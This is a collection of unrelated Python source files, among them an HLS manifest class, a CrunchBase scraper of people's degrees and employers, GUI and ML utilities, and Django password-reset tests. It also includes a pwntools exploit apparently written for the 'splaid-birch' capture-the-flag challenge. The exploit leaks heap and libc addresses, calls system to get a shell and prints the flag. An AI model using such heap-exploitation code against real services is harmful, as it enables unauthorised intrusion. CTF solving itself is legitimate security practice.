def hlsMasterPlaylistVersion(self, new_hls_master_playlist_version):
if new_hls_master_playlist_version is None:
self._hlsMasterPlaylistVersion = None
elif isinstance(new_hls_master_playlist_version, HlsVersion):
self._hlsMasterPlaylistVersion = new_hls_master_playlist_version.value
elif isinstance(new_hls_master_playlist_version, int):
self._hlsMasterPlaylistVersion = new_hls_master_playlist_version
else:
            raise InvalidTypeError('hlsMasterPlaylistVersion has to be of type HlsVersion or int')
@classmethod
def parse_from_json_object(cls, json_object):
manifest = AbstractManifest.parse_from_json_object(json_object=json_object)
id_ = manifest.id
manifest_name = manifest.manifestName
name = manifest.name
description = manifest.description
custom_data = manifest.customData
outputs = manifest.outputs
hls_media_playlist_version = json_object.get('hlsMediaPlaylistVersion')
hls_master_playlist_version = json_object.get('hlsMasterPlaylistVersion')
hls_manifest = HlsManifest(id_=id_, manifest_name=manifest_name, custom_data=custom_data,
outputs=outputs, name=name, description=description,
hls_media_playlist_version=hls_media_playlist_version,
hls_master_playlist_version=hls_master_playlist_version)
return hls_manifest
def serialize(self):
serialized = super().serialize()
serialized['hlsMediaPlaylistVersion'] = self.hlsMediaPlaylistVersion
serialized['hlsMasterPlaylistVersion'] = self.hlsMasterPlaylistVersion
return serialized
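# Hedged usage sketch: the playlist versions may be given as HlsVersion members
# or as plain ints (the setters above accept both); the empty outputs list and
# the manifest name are placeholder assumptions.
if __name__ == '__main__':
    manifest = HlsManifest(manifest_name='stream.m3u8', outputs=[],
                           hls_media_playlist_version=4,
                           hls_master_playlist_version=4)
    print(manifest.hlsMediaPlaylistVersion, manifest.hlsMasterPlaylistVersion)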
|
116783
|
import csv
import urllib2
import json
###########################################################################
## Functions to write an array to CSV, and read from CSV
## (defined first so the script below can call them)
###########################################################################
def write_to_csv(csv_name, array):
    columns = len(array[0])
    rows = len(array)
    with open(csv_name, "wb") as test_file:
        file_writer = csv.writer(test_file)
        for i in range(rows):
            print(i)
            file_writer.writerow([array[i][j] for j in range(columns)])
def read_table(csv_name, include_header):
    table = []
    with open(csv_name, 'rU') as csvfile:
        f = csv.reader(csvfile, delimiter=',')
        firstline = True
        for row in f:
            if firstline == False or include_header == True:
                table.append(tuple(row))
            firstline = False
    return table
###########################################################################
## Some results return special characters, this function strips those out
###########################################################################
def strip_special(array, columns_with_string):
    new_table = []
    for i in array:
        new_row = []
        for j in range(len(i)):
            if j in columns_with_string:
                x = i[j].encode('utf-8').strip()
            else:
                x = i[j]
            new_row.append(x)
        new_table.append(new_row)
    return new_table
###########################################################################
## This searches crunchbase for "Stanford" and only returns people
###########################################################################
search = "http://api.crunchbase.com/v/1/search.js?query=stanford&entity=person&api_key=XXXX" ##Replace XXXX with CrunchBase API key
people_info = []
for i in range(300):
    page = i
    url = search + "&page=" + str(page)
    print(i)
    req = urllib2.Request(url)
    j = urllib2.urlopen(req)
    js = json.load(j)
    people = len(js['results'])
    for p in range(people):
        permalink = js['results'][p]['permalink']
        person_info = (permalink, 'stanford')
        print(person_info)
        people_info.append(person_info)
write_to_csv('stanford_people.csv', people_info)
###########################################################################
## This takes the people from above, and looks each one up. It returns a
## dimension_relationships table and a dimension_degrees table
###########################################################################
dim_degrees = []
dim_relationships = []
errors = []
count = 0
people = read_table('stanford_people.csv', True)
for p in people:
    permalink = p[0]
    url = "http://api.crunchbase.com/v/1/person/" + permalink + ".js?api_key=XXXX" ##Replace XXXX with CrunchBase API key
    print(p[0])
    print(count)
    count += 1
    try:
        req = urllib2.Request(url)
        j = urllib2.urlopen(req)
        js = json.load(j)
        first_name = js['first_name']
        last_name = js['last_name']
        degrees = js['degrees']
        relationships = js['relationships']
        for d in degrees:
            degree_type = d['degree_type']
            subject = d['subject']
            institution = d['institution']
            graduated_year = d['graduated_year']
            deg = (permalink, first_name, last_name, degree_type, subject, institution, graduated_year)
            dim_degrees.append(deg)
        for r in relationships:
            is_past = r['is_past']
            title = r['title']
            firm_name = r['firm']['name']
            firm_permalink = r['firm']['permalink']
            rel = (permalink, first_name, last_name, is_past, title, firm_name, firm_permalink)
            dim_relationships.append(rel)
    except urllib2.HTTPError:
        print('is error!')
        errors.append((permalink, count))
write_to_csv('stanford_relationships.csv', dim_relationships)
write_to_csv('stanford_degrees.csv', dim_degrees)
write_to_csv('errors.csv', errors)
|
116792
|
from pwn import *
context.arch="amd64"
elf = ELF("./splaid-birch")
libc = ELF("./libc.so.6")
#p = process("./splaid-birch")
p = remote("splaid-birch.pwni.ng", 17579)
def sp_add(a, b):
p.sendline("5")
p.sendline(str(a))
p.sendline(str(b))
def delete(a):
p.sendline("1")
p.sendline(str(a))
for i in range(1, 3):
sp_add(i, 0x0)
sp_add(0, 0)
p.sendline("4")
p.sendline("531")
heap = int(p.recvline())
heap_base = heap - 0x12f8
for i in range(157):
sp_add(0x10+i, 0x0)
for i in range(0x10):
delete(0x10 + i)
sp_add(0x1234, heap + 0x1db8)
p.sendline("4")
p.sendline("-1817")
libc.address = int(p.recvline()) - 0x3ebca0
environ = libc.address + 0x3ee098
print "heap: " + hex(heap)
print "libc: " + hex(libc.address)
payload = "5\n"
payload += "5555\n"
payload += str(heap_base+0x4c0) + "\n"
payload += "4\n"
payload += "-1827\n"
payload += "5\n"
payload += str(0x6873) + "\n"
payload += "6666\n"
payload += "1\n"
payload += str(0x6873) + "\n"
payload = payload.ljust(0x200, "\x41")
fuck = libc.address + 0x3ed8e8 + 0x20
addr = p64(libc.address + 0x4f440) # system
payload += flat(0x0, 0x1234, 0x1234, 0x1234, 0, heap_base + 0x4c0 + 0x60, 0, 0, 0x4444, addr, 0, 0, fuck, fuck, 0x0, 0x10, 0x20)
payload = payload.ljust(0x500, "\x00")
p.sendline(payload)
p.interactive()
'''
$ id
uid=1012(splaid) gid=1013(splaid) groups=1013(splaid)
$ cd /home/splaid
$ ls
flag.txt
libsplaid.so.1
run.sh
splaid-birch
$ cat flag.txt
PCTF{7r335_0n_h34p5_0n_7r335_0n_5l3470r}
$
'''
|
116815
|
from taskloaf.cfg import Cfg
from taskloaf.zmq_cluster import zmq_run
from taskloaf.promise import task, when_all
from taskloaf.object_ref import alloc, put
from taskloaf.profile import Profiler
from taskloaf.timer import Timer
_ctx = None
def set_ctx(ctx):
global _ctx
_ctx = ctx
def ctx():
return _ctx
__all__ = [
"Cfg",
"zmq_run",
"task",
"when_all",
"alloc",
"put",
"Profiler",
"Timer",
]
|
116819
|
import cv2
import copy
import xxhash
import numpy as np
import imgui
import OpenGL.GL as gl
from .static_vars import *
from timeit import default_timer as timer
from . import imgui_ext
import math
from typing import *
from dataclasses import dataclass
_start = timer()
USE_FAST_HASH = True
LOG_GPU_USAGE = False
"""
Some type synonyms in order to make the code easier to understand
"""
TextureId = int # this is an openGl texture id
Image_RGB = np.ndarray # denotes a RGB image
Image_AnyType = np.ndarray # denotes any image contained in a np.ndarray
ImageAddress = int # this is the image memory address
def _is_close(a: float, b: float) -> bool:
return math.fabs(a - b) < 1E-6
# noinspection PyShadowingNames
class ImageAdjustments:
factor: float
delta: float
def __init__(self, factor: float = 1., delta: float = 0.):
self.factor = factor
self.delta = delta
def is_none(self):
return _is_close(self.factor, 1.) and _is_close(self.delta, 0.)
def adjust(self, image):
if self.is_none():
return image
else:
adjusted = ((image + self.delta) * self.factor).astype(image.dtype)
return adjusted
def __hash__(self):
return hash((self.factor, self.delta))
def __eq__(self, other):
return self.factor == other.factor and self.delta == other.delta
def _hash_image(image):
"""
Two hash variant are possible :
- if imgui_cv.USE_FAST_HASH is True : select 100 random pixels and hash them
- otherwise : compute the hash of the whole image (using xxhash for performance)
:param image:
:return:hash
"""
if USE_FAST_HASH:
rng = np.random.RandomState(89)
inds = rng.randint(low=0, high=image.size, size=100)
b = image.flat[inds]
result = hash(tuple(b.data))
return result
else:
# cf https://stackoverflow.com/questions/16589791/most-efficient-property-to-hash-for-numpy-array
h = xxhash.xxh64()
h.update(image)
result = h.intdigest()
h.reset()
return result
class ImageAndAdjustments:
image: Image_AnyType
    image_adjustments: ImageAdjustments
def __init__(self, image, image_adjustments):
self.image = image
self.image_adjustments = image_adjustments
def adjusted_image(self):
return self.image_adjustments.adjust(self.image)
def __hash__(self):
hash_adjust = hash(self.image_adjustments)
hash_image = _hash_image(self.image)
result = hash((hash_adjust, hash_image))
return result
def __eq__(self, other):
"""
For performance reasons, the __eq__ operator is made to take only the hash into account.
@see _image_to_texture()
"""
hash1 = hash(self)
hash2 = hash(other)
return hash1 == hash2
class SizePixel:
width: int
height: int
def __init__(self, width=0, height=0):
self.width = int(width)
self.height = int(height)
@staticmethod
def from_image(image):
self = SizePixel()
self.width = image.shape[1]
self.height = image.shape[0]
return self
def as_tuple_width_height(self):
return self.width, self.height
# ALL_TEXTURES contains a dict of all the images that were transferred to the GPU
# plus their last access time
TimeSecond = float
NB_GEN_TEXTURES = 0
def _generate_texture_id() -> TextureId:
texture_id = gl.glGenTextures(1)
if LOG_GPU_USAGE:
global NB_GEN_TEXTURES
NB_GEN_TEXTURES = NB_GEN_TEXTURES + 1
print(f"NB_GEN_TEXTURES = {NB_GEN_TEXTURES}")
return texture_id
@dataclass
class ImageStoredOnGpu:
image_and_adjustments: ImageAndAdjustments
texture_id: TextureId
time_last_access: TimeSecond = -10000.
def __init__(self, image_and_adjustments: ImageAndAdjustments, time_last_access):
self.image_and_adjustments = image_and_adjustments
self.time_last_access = time_last_access
self.texture_id = _generate_texture_id()
AllTexturesDict = Dict[ImageAddress, ImageStoredOnGpu]
ALL_TEXTURES: AllTexturesDict = {}
def _to_rgb_image(img: Image_AnyType) -> Image_RGB:
img_rgb = None
if len(img.shape) >= 3:
channels = img.shape[2]
else:
channels = 1
if channels == 1:
if img.dtype == np.uint8:
img_rgb = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
elif img.dtype in [np.float32, np.float64]:
img_grey = np.uint8(img * 255.)
img_rgb = cv2.cvtColor(img_grey, cv2.COLOR_GRAY2BGR)
elif channels == 3:
if not img.dtype == np.uint8:
raise ValueError("imgui_cv does only support uint8 images with multiple channels")
img_rgb = img
elif channels == 4:
if not img.dtype == np.uint8:
raise ValueError("imgui_cv does only support uint8 images with multiple channels")
# we do not handle alpha very well...
img_rgb = cv2.cvtColor(img, cv2.COLOR_BGRA2BGR)
return img_rgb
NB_REFRESH_TEXTURES = 0
def _image_rgb_to_texture_impl(img_rgb: Image_RGB, texture_id: TextureId):
"""
    Uploads img_rgb to the GPU into the given texture_id, and returns that id
"""
# inspired from https://www.programcreek.com/python/example/95539/OpenGL.GL.glPixelStorei (example 3)
if LOG_GPU_USAGE:
global NB_REFRESH_TEXTURES
NB_REFRESH_TEXTURES = NB_REFRESH_TEXTURES + 1
print(f"NB_REFRESH_TEXTURES = {NB_REFRESH_TEXTURES}")
width = img_rgb.shape[1]
height = img_rgb.shape[0]
gl.glPixelStorei(gl.GL_UNPACK_ALIGNMENT, 1)
gl.glBindTexture(gl.GL_TEXTURE_2D, texture_id)
gl.glPixelStorei(gl.GL_UNPACK_ALIGNMENT, 1)
gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MAG_FILTER, gl.GL_LINEAR)
gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MIN_FILTER, gl.GL_LINEAR)
gl.glTexImage2D(gl.GL_TEXTURE_2D, 0, gl.GL_RGB, width, height, 0, gl.GL_BGR, gl.GL_UNSIGNED_BYTE, img_rgb)
gl.glBindTexture(gl.GL_TEXTURE_2D, 0)
return texture_id
def _image_to_texture(
image_and_adjustments: ImageAndAdjustments,
always_refresh: bool,
linked_user_image_address: ImageAddress
):
"""
_image_to_texture will transfer the image to the GPU and return a texture Id
    Some GPUs might choke if too many textures are transferred.
For this reason :
- a cache is maintained (ALL_TEXTURES)
- a quick comparison is made before the transfer:
@see _hash_image()
@see ImageAndAdjustments.__eq__() : for performance reasons, the __eq__ operator
is made to take only the hash into account.
:param image_and_adjustments:
:return: texture_id
"""
now = timer()
if linked_user_image_address == 0:
image_address = id(image_and_adjustments.image)
else:
image_address = linked_user_image_address
shall_refresh = False
if image_address not in ALL_TEXTURES:
ALL_TEXTURES[image_address] = ImageStoredOnGpu(image_and_adjustments, now)
shall_refresh = True
if always_refresh:
shall_refresh = True
image_stored_on_gpu: ImageStoredOnGpu = ALL_TEXTURES[image_address]
image_stored_on_gpu.time_last_access = now
if shall_refresh:
image_and_adjustments_copy = copy.deepcopy(image_and_adjustments)
img_adjusted = image_and_adjustments_copy.adjusted_image()
img_rgb = _to_rgb_image(img_adjusted)
_image_rgb_to_texture_impl(img_rgb, image_stored_on_gpu.texture_id)
return image_stored_on_gpu.texture_id
def _clear_all_cv_textures():
global ALL_TEXTURES
all_textures_updated = {}
textures_to_delete = []
now = timer()
for image_address, image_stored_on_gpu in ALL_TEXTURES.items():
age_seconds = now - image_stored_on_gpu.time_last_access
if age_seconds < 0.3:
all_textures_updated[image_address] = image_stored_on_gpu
else:
textures_to_delete.append(image_stored_on_gpu.texture_id)
ALL_TEXTURES = all_textures_updated
if len(textures_to_delete) > 0:
gl.glDeleteTextures(textures_to_delete)
# print("Delete {0} old texture(s), len={1}".format(len(textures_to_delete), len(ALL_TEXTURES)))
def _image_viewport_size(image, width=None, height=None):
image_width = image.shape[1]
image_height = image.shape[0]
if (width is not None) and (height is not None):
viewport_size = SizePixel(width, height)
elif width is not None:
viewport_size = SizePixel(width, round(image_height / image_width * width))
elif height is not None:
viewport_size = SizePixel(round(image_width / image_height * height), height)
else:
viewport_size = SizePixel.from_image(image)
return viewport_size
@static_vars(
zoomed_status={},
zoom_click_times={},
last_shown_image=None)
def _image_impl(
        image_and_adjustments,
        width=None, height=None, title="",
        always_refresh=False,
        linked_user_image_address: ImageAddress = 0
):
    statics = _image_impl.statics
    statics.last_shown_image = image_and_adjustments
    zoom_key = imgui_ext.make_unique_label(title)
    if zoom_key not in statics.zoomed_status:
        statics.zoom_click_times[zoom_key] = 0
        statics.zoomed_status[zoom_key] = False
    if statics.zoomed_status[zoom_key]:
        viewport_size = SizePixel.from_image(image_and_adjustments.image)
    else:
        viewport_size = _image_viewport_size(image_and_adjustments.image, width, height)
    texture_id = _image_to_texture(
        image_and_adjustments,
        always_refresh=always_refresh,
        linked_user_image_address=linked_user_image_address
    )
if title == "":
imgui.image_button(texture_id, viewport_size.width, viewport_size.height, frame_padding=0)
is_mouse_hovering = imgui.is_item_hovered()
else:
imgui.begin_group()
imgui.image_button(texture_id, viewport_size.width, viewport_size.height, frame_padding=0)
is_mouse_hovering = imgui.is_item_hovered()
imgui.text(title)
imgui.end_group()
if is_mouse_hovering and imgui.get_io().mouse_down[0]:
last_time = statics.zoom_click_times[zoom_key]
now = timer()
if now - last_time > 0.3:
statics.zoomed_status[zoom_key] = not statics.zoomed_status[zoom_key]
statics.zoom_click_times[zoom_key] = now
return mouse_position_last_image()
def image(
img,
width=None,
height=None,
title="",
image_adjustments=None,
always_refresh = False,
linked_user_image_address: ImageAddress = 0
):
if image_adjustments is None:
image_adjustments = ImageAdjustments()
    image_and_adjustments = ImageAndAdjustments(img, image_adjustments)
    return _image_impl(
        image_and_adjustments,
        width=width, height=height,
        title=title,
        always_refresh=always_refresh,
        linked_user_image_address=linked_user_image_address
    )
def _is_in_image(pixel, image_shape):
# type : (imgui.Vec2, shape) -> Bool
w = image_shape[1]
h = image_shape[0]
x = pixel.x
y = pixel.y
return x >= 0 and x < w and y >= 0 and y < h
def _is_in_last_image(pixel):
last_image_shape = _image_impl.statics.last_shown_image.image.shape
return _is_in_image(pixel, last_image_shape)
def mouse_position_last_image():
io = imgui.get_io()
mouse = io.mouse_pos
rect_min = imgui.get_item_rect_min()
mouse_relative = imgui.Vec2(mouse.x - rect_min.x, mouse.y - rect_min.y)
if not _is_in_last_image(mouse_relative):
return None
else:
return mouse_relative
def is_mouse_hovering_last_image(): # only works if the image was presented in its original size
if not imgui.is_item_hovered_rect():
return False
mouse = mouse_position_last_image()
if mouse is None:
return False
else:
return True
def image_explorer(image, width=None, height=None, title="", zoom_key="", hide_buttons=False,
image_adjustments=None,
always_refresh = False
):
"""
:param image_adjustments:
:param hide_buttons:
:param image: opencv / np image.
:param width:
:param height:
:param title: an optional title
:param zoom_key: Set the same zoom_key for two image if you want to link their zoom settings
:return: mouse location in image coordinates (None if the mouse is outside of the image)
"""
if image_adjustments is None:
image_adjustments = ImageAdjustments()
from ._imgui_cv_zoom import image_explorer_autostore_zoominfo
viewport_size = _image_viewport_size(image, width, height)
imgui.begin_group()
mouse_location_original_image = image_explorer_autostore_zoominfo(
image,
viewport_size,
title,
zoom_key,
image_adjustments,
hide_buttons=hide_buttons,
always_refresh = always_refresh
)
imgui.end_group()
return mouse_location_original_image
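# Hedged self-check for _to_rgb_image (not wired into any test runner; the
# shapes below are arbitrary): a float32 grayscale image should come back as a
# 3-channel uint8 image.
def _self_check_to_rgb_image() -> None:
    gray = np.zeros((4, 4), dtype=np.float32)
    rgb = _to_rgb_image(gray)
    assert rgb.shape == (4, 4, 3)
    assert rgb.dtype == np.uint8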
|
116836
|
import unittest
def test_red():
pass
class AwesomeTestCase(unittest.TestCase):
def test_yellow(self):
pass
def test_green(self):
pass
    def test_blue(self):
        pass
|
116869
|
from mlflow.tracking.request_header.abstract_request_header_provider import RequestHeaderProvider
class PluginRequestHeaderProvider(RequestHeaderProvider):
"""RequestHeaderProvider provided through plugin system"""
def in_context(self):
return False
def request_headers(self):
return {"test": "header"}
|
116899
|
import os.path as osp
import shutil
import torch
from collections import OrderedDict
import json
class Saver(object):
def __init__(self, cfg):
self.cfg = cfg
self.checkpoint_dir = cfg["checkpoint_dir"]
self.export_dir = cfg["export_dir"]
def save_checkpoint(self, state, is_best, filename="checkpoint.pth.tar", save_model=True):
"""Saves checkpoint to disk"""
filename = osp.join(self.checkpoint_dir, filename)
if save_model: torch.save(state, filename)
if is_best:
best_pred = state["best_pred"]
with open(osp.join(self.export_dir, "best_pred.txt"), "w") as f:
json.dump(best_pred, f)
if save_model: shutil.copyfile(filename, osp.join(self.export_dir, "model_best.pth.tar"))
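# Hedged usage sketch: the directory names and the state-dict layout below are
# assumptions; Saver only requires a "best_pred" entry when is_best is True.
if __name__ == "__main__":
    saver = Saver({"checkpoint_dir": ".", "export_dir": "."})
    state = {"epoch": 1, "state_dict": {}, "best_pred": 0.5}
    saver.save_checkpoint(state, is_best=True)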
|
116913
|
from setuptools import setup, find_packages
setup(name='chi_annotator', version='1.0', packages=find_packages())
|
116939
|
import unittest
from rdflib import RDFS, Namespace
from funowl.annotations import Annotation
from funowl.class_axioms import SubClassOf, EquivalentClasses, DisjointClasses, DisjointUnion, HasKey
from funowl.class_expressions import ObjectIntersectionOf, ObjectSomeValuesFrom, ObjectUnionOf
from funowl.dataproperty_expressions import DataPropertyExpression
from funowl.objectproperty_expressions import ObjectPropertyExpression
from funowl.writers.FunctionalWriter import FunctionalWriter
from tests.utils.base import TestBase
SCT = Namespace("http://snomed.info/id/")
class ClassAxiomsTestCase(TestBase):
def setUp(self) -> None:
self.sw = FunctionalWriter()
self.sw.bind(None, SCT)
def test_equivalentclasses(self):
self.assertEqual("""EquivalentClasses(
:303394007
:45189000
:609096000
)""", str(EquivalentClasses(SCT['303394007'], SCT['45189000'], SCT['609096000']).to_functional(self.sw)))
with self.assertRaises(ValueError, msg="at least 2 arguments are required"):
str(EquivalentClasses( SCT['303394007']).to_functional(self.sw))
# Taken from SNOMED CT
self.assertEqual("""EquivalentClasses(
:303394007
ObjectIntersectionOf(
:45189000
ObjectSomeValuesFrom( :609096000 ObjectIntersectionOf(
ObjectSomeValuesFrom( :260686004 :129397003 )
ObjectSomeValuesFrom( :363700003 :52988006 )
ObjectSomeValuesFrom( :405813007 :69695003 )
) )
)
)""", str(EquivalentClasses(
SCT['303394007'],
ObjectIntersectionOf(
SCT['45189000'],
ObjectSomeValuesFrom(
SCT['609096000'],
ObjectIntersectionOf(
ObjectSomeValuesFrom(SCT['260686004'], SCT['129397003']),
ObjectSomeValuesFrom(SCT['363700003'], SCT['52988006']),
ObjectSomeValuesFrom(SCT['405813007'], SCT['69695003']))))).to_functional(self.sw.reset())))
def test_oio(self):
""" Bug: ObjectIntersectionOf ends up being a single argument to ObjectSomeValuesOf """
self.assertEqual("""ObjectIntersectionOf(
:45189000
ObjectSomeValuesFrom( :609096000 ObjectUnionOf(
:1
:2
) )
)""", str(ObjectIntersectionOf(
SCT['45189000'],
ObjectSomeValuesFrom(
SCT['609096000'],
ObjectUnionOf(
SCT['1'],
SCT['2']))).to_functional(self.sw.reset())))
def test_disjointclasses(self):
self.assertEqual("""DisjointClasses(
:303394007
:45189000
:609096000
)""", str(DisjointClasses(SCT['303394007'], SCT['45189000'], SCT['609096000']).to_functional(self.sw)))
def test_disjointunion(self):
self.assertEqual("""DisjointUnion( :12345
:303394007
:45189000
:609096000
)""", str(DisjointUnion(SCT['12345'], SCT['303394007'], SCT['45189000'], SCT['609096000']).
to_functional(self.sw.reset())))
with self.assertRaises(ValueError, msg="Have to have at least 2 expressions"):
DisjointUnion(SCT['12345'], SCT['303394007']).to_functional(self.sw)
def test_haskey(self):
self.assertEqual('''HasKey( :12345 (
:23456
:23457
) (
:23458
:23459
) )''', str(HasKey(SCT['12345'], ObjectPropertyExpression(SCT['23456']), ObjectPropertyExpression(SCT['23457']),
DataPropertyExpression(SCT['23458']), DataPropertyExpression(SCT['23459'])).to_functional(self.sw.reset())))
if __name__ == '__main__':
unittest.main()
|
116944
|
import torch
from torch import optim
from const import Phase
from batch import create_dataset
from models import Baseline
from sklearn.metrics import classification_report
def run(dataset_train,
dataset_dev,
dataset_test,
model_type,
word_embed_size,
hidden_size,
batch_size,
use_cuda,
n_epochs):
if model_type == 'base':
model = Baseline(vocab=dataset_train.vocab,
word_embed_size=word_embed_size,
hidden_size=hidden_size,
use_cuda=use_cuda,
inference=False)
else:
raise NotImplementedError
if use_cuda:
model = model.cuda()
optim_params = model.parameters()
optimizer = optim.Adam(optim_params, lr=10**-3)
print('start training')
for epoch in range(n_epochs):
train_loss, tokens, preds, golds = train(dataset_train,
model,
optimizer,
batch_size,
epoch,
Phase.TRAIN,
use_cuda)
dev_loss, tokens, preds, golds = train(dataset_dev,
model,
optimizer,
batch_size,
epoch,
Phase.DEV,
use_cuda)
logger = '\t'.join(['epoch {}'.format(epoch+1),
'TRAIN Loss: {:.9f}'.format(train_loss),
'DEV Loss: {:.9f}'.format(dev_loss)])
print('\r'+logger, end='')
test_loss, tokens, preds, golds = train(dataset_test,
model,
optimizer,
batch_size,
epoch,
Phase.TEST,
use_cuda)
print('====', 'TEST', '=====')
print_scores(preds, golds)
output_results(tokens, preds, golds)
def train(dataset,
model,
optimizer,
batch_size,
n_epoch,
phase,
use_cuda):
total_loss = 0.0
tokens = []
preds = []
labels = []
if phase == Phase.TRAIN:
model.train()
else:
model.eval()
for batch in dataset.batch_iter:
token = getattr(batch, 'token')
label = getattr(batch, 'label')
if use_cuda:
raw_sentences = dataset.get_raw_sentence(token.data.cpu().numpy())
else:
raw_sentences = dataset.get_raw_sentence(token.data.numpy())
loss, pred = \
model(token, raw_sentences, label, phase)
        if phase == Phase.TRAIN:
            optimizer.zero_grad()
            loss.backward()
            # clip after backward() so the freshly computed gradients are clipped
            torch.nn.utils.clip_grad_norm(model.parameters(), max_norm=5)
            optimizer.step()
# remove PAD from input sentences/labels and results
mask = (token != dataset.pad_index)
length_tensor = mask.sum(1)
if use_cuda:
length_tensor = length_tensor.data.cpu().numpy()
else:
length_tensor = length_tensor.data.numpy()
for index, n_tokens_in_the_sentence in enumerate(length_tensor):
if n_tokens_in_the_sentence > 0:
tokens.append(raw_sentences[index][:n_tokens_in_the_sentence])
_label = label[index][:n_tokens_in_the_sentence]
_pred = pred[index][:n_tokens_in_the_sentence]
if use_cuda:
_label = _label.data.cpu().numpy()
_pred = _pred.data.cpu().numpy()
else:
_label = _label.data.numpy()
_pred = _pred.data.numpy()
labels.append(_label)
preds.append(_pred)
total_loss += loss.data.mean()
return total_loss, tokens, preds, labels
def read_two_cols_data(fname):
data = {}
tokens = []
labels = []
token = []
label = []
with open(fname, mode='r') as f:
for line in f:
line = line.strip().lower().split()
if line:
                _token, _label = line
token.append(_token)
if _label == '0' or _label == '1':
label.append(int(_label))
else:
if _label == 'del':
label.append(1)
else:
label.append(0)
            else:
                tokens.append(token)
                labels.append(label)
                token = []
                label = []
    # flush the last sentence if the file does not end with a blank line
    if token:
        tokens.append(token)
        labels.append(label)
    data['tokens'] = tokens
    data['labels'] = labels
    return data
def load(train_path, dev_path, test_path, batch_size, device):
train = read_two_cols_data(train_path)
dev = read_two_cols_data(dev_path)
test = read_two_cols_data(test_path)
data = {Phase.TRAIN: train, Phase.DEV: dev, Phase.TEST: test}
return create_dataset(data, batch_size=batch_size, device=device)
def print_scores(preds, golds):
_preds = [label for sublist in preds for label in sublist]
_golds = [label for sublist in golds for label in sublist]
target_names = ['not_del', 'del']
print(classification_report(_golds, _preds, target_names=target_names, digits=5))
def output_results(tokens, preds, golds, path='./result/sentcomp'):
with open(path+'.original.txt', mode='w') as w, \
open(path+'.gold.txt', mode='w') as w_gold, \
open(path+'.pred.txt', mode='w') as w_pred:
for _tokens, _golds, _preds in zip(tokens, golds, preds):
for token, gold, pred in zip(_tokens, _golds, _preds):
w.write(token + ' ')
if gold == 0:
w_gold.write(token + ' ')
# 0 -> keep, 1 -> delete
if pred == 0:
w_pred.write(token + ' ')
w.write('\n')
w_gold.write('\n')
w_pred.write('\n')
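# Hedged self-check for read_two_cols_data: builds a tiny two-column file
# (token and label per line, blank line between sentences) and parses it.
# The file content is an arbitrary assumption, and this only runs where the
# project imports at the top of this file resolve.
if __name__ == '__main__':
    import os
    import tempfile
    with tempfile.NamedTemporaryFile('w', suffix='.txt', delete=False) as f:
        f.write('The 0\nvery del\nbig 0\n\n')
        tmp_path = f.name
    parsed = read_two_cols_data(tmp_path)
    os.remove(tmp_path)
    assert parsed['tokens'] == [['the', 'very', 'big']]
    assert parsed['labels'] == [[0, 1, 0]]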
|
116980
|
from django.conf import settings
from django.core import mail
from django.urls import reverse
from django.utils.html import escape
from lib.tests.utils import BasePermissionTest, ClientTest
class PermissionTest(BasePermissionTest):
def test_password_reset(self):
url = reverse('password_reset')
template = 'registration/password_reset_form.html'
# Page should be usable while signed out, since the point of the page
# is to help people trying to sign in. Also usable while signed in;
# not a big use case, but doesn't hurt.
self.assertPermissionLevel(
url, self.SIGNED_OUT, template=template)
def test_password_reset_done(self):
url = reverse('password_reset_done')
template = 'registration/password_reset_done.html'
self.assertPermissionLevel(
url, self.SIGNED_OUT, template=template)
def test_password_reset_confirm(self):
url = reverse('password_reset_confirm', args=['a', 'a-a'])
template = 'registration/password_reset_confirm.html'
self.assertPermissionLevel(
url, self.SIGNED_OUT, template=template)
def test_password_reset_complete(self):
url = reverse('password_reset_complete')
template = 'registration/password_reset_complete.html'
self.assertPermissionLevel(
url, self.SIGNED_OUT, template=template)
class PasswordResetTest(ClientTest):
@classmethod
def setUpTestData(cls):
# Call the parent's setup (while still using this class as cls)
super().setUpTestData()
cls.user = cls.create_user(
username='sampleUsername', password='<PASSWORD>',
email='<EMAIL>')
def submit_and_get_reset_link(self):
"""Shortcut function for tests focusing on the final reset step."""
self.client.post(reverse('password_reset'), dict(
email='<EMAIL>'))
instructions_email = mail.outbox[-1]
# Reset link: should be the first link (first "word" with '://')
# in the email.
reset_link = None
for word in instructions_email.body.split():
if '://' in word:
reset_link = word
break
self.assertIsNotNone(reset_link)
return reset_link
def test_submit(self):
response = self.client.post(
reverse('password_reset'),
dict(email='<EMAIL>'), follow=True)
self.assertTemplateUsed(
response, 'registration/password_reset_done.html')
# Email should've been sent.
self.assertEqual(len(mail.outbox), 1)
def test_submit_with_nonexistent_email(self):
"""Even if the email address is not in CoralNet's database, this form
should still submit successfully - with the usual wording to the effect
of 'we've sent an email, if our DB has this address'. This way,
snoopers can't check if an arbitrary email address (which they
don't own) is in the database or not."""
response = self.client.post(
reverse('password_reset'),
dict(email='<EMAIL>'), follow=True)
self.assertTemplateUsed(
response, 'registration/password_reset_done.html')
# Since our DB does not have this address, we won't actually send an
# email.
self.assertEqual(len(mail.outbox), 0)
def test_submit_with_empty_email(self):
response = self.client.post(
reverse('password_reset'),
dict(), follow=True)
self.assertTemplateUsed(
response, 'registration/password_reset_form.html')
self.assertContains(
response,
"This field is required.")
def test_submit_instructions_email_details(self):
self.client.post(reverse('password_reset'), dict(
email='<EMAIL>'))
instructions_email = mail.outbox[-1]
self.assertListEqual(
instructions_email.to, ['<EMAIL>'],
"Recipients should be correct")
self.assertListEqual(instructions_email.cc, [], "cc should be empty")
self.assertListEqual(instructions_email.bcc, [], "bcc should be empty")
self.assertIn(
"Reset your password", instructions_email.subject,
"Subject template should be correct, based on subject text")
self.assertIn(
"you requested a password reset",
instructions_email.body,
"Email body template should be correct, based on body text")
self.assertIn(
self.user.username, instructions_email.body,
"Username should be in the email body")
self.assertIn(
settings.ACCOUNT_QUESTIONS_LINK, instructions_email.body,
"Account questions link should be in the email body")
def test_reset(self):
reset_link = self.submit_and_get_reset_link()
# Navigate to the reset link.
response = self.client.get(reset_link, follow=True)
self.assertTemplateUsed(
response, 'registration/password_reset_confirm.html')
# We actually got redirected to a different URL without the pass-reset
# token (for security purposes), so we need to get that URL for the
# next step.
reset_redirect_url = response.wsgi_request.path
# Complete the password reset.
response = self.client.post(
reset_redirect_url,
dict(
new_password1='<PASSWORD>',
new_password2='<PASSWORD>',
),
follow=True,
)
self.assertTemplateUsed(
response, 'registration/password_reset_complete.html')
# Check that the password has changed: attempt to log in with the
# new password, and check that we're signed in as the expected user.
self.client.logout()
self.client.login(
username='sampleUsername', password='<PASSWORD>')
